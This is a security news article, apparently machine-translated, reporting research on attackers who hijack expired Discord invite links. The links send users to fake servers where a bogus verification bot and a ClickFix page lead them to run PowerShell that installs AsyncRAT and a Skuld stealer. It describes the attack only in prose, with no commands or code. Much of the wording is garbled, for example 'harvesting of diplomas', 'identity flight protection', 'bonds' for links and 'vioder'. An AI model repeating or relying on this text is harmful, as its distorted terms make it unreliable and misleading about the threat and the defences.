- Cybercriminals recycle expired contention to launch silent and devastating attacks of malicious software in several stages
- A fake Bot Discord intimate users in the execution of PowerShell Orders Disguised as Captcha corrective
- The old links of the community invitation now lead to malware servers to steal your digital data and assets
Cybercriminals are increasingly using a less known fault in the discord invitation system to target without distrust users, especially players, said new research.
A report by Check Point researchers found that the attackers manage to record previously valid invitation links with personalized vanity URLs.
The tactic implies the diversion of once legitimate and reliable expired or deleted Discord Inviting links and redirecting them to malicious servers hosting malware campaigns in several stages.
Bonds of trust in dangerous redirects
These diverted links, often integrated into old forum posts, community pages or social media, are used to silently channel users to discordant servers exploited by threat actors.
Once on these false servers, users are welcomed by what seems to be a standard verification process.
A bot named “Safeguard” invites visitors to click on a “Check” button, which initiates an Oauth2 process and redirects them to a phishing site.
The site uses a social engineering method called “clickfix”, where users are led to copy and execute a PowerShell command under the guise of repairing a broken Captcha.
This action silently launches the malware installation chain, attackers using cloud services such as Pastebin, Github and Bitbucket to provide useful loads in several stages, allowing them to blend into normal network traffic.
Initial scripts download executables that recover other useful encrypted charges, which include Asyncrat, a tool that gives attackers the remote control on infected systems, and a custom SKULD stealer variant designed to extract identification information and cryptocurrency portfolio data.
Players have become a main target, campaigns even disguising malware such as tools like The Sims 4 DLC unlocking – an archive named Sims4-unlocker.zip has been downloaded more than 350 times, highlighting the scope of the campaign.
Thanks to intelligent escape techniques such as delayed execution and command line arguments, malware often bypasses detection of the best antivirus software.
The threats extend beyond infections typical of malicious software. The SKULD thief used in these attacks can extract sentences and passwords from cryptographic wallet seeds, effectively granting total control over the digital assets of the victims.
Given the emphasis on the flight of cryptocurrency and the harvesting of diplomas, individuals should strengthen their defenses with robust identity flight protection services.
These tools can monitor the unauthorized use of personal information, alert users to vioder and help recover compromise digital identities.
While some may assume that the tools for protecting the final points would protect them from these tactics, the multilayer attack structure of the attack often steals under the radar.
To stay safe, users must be wary of bonds, especially those integrated into old content. Also avoid performing unexpected scripts or suspicious verification steps.
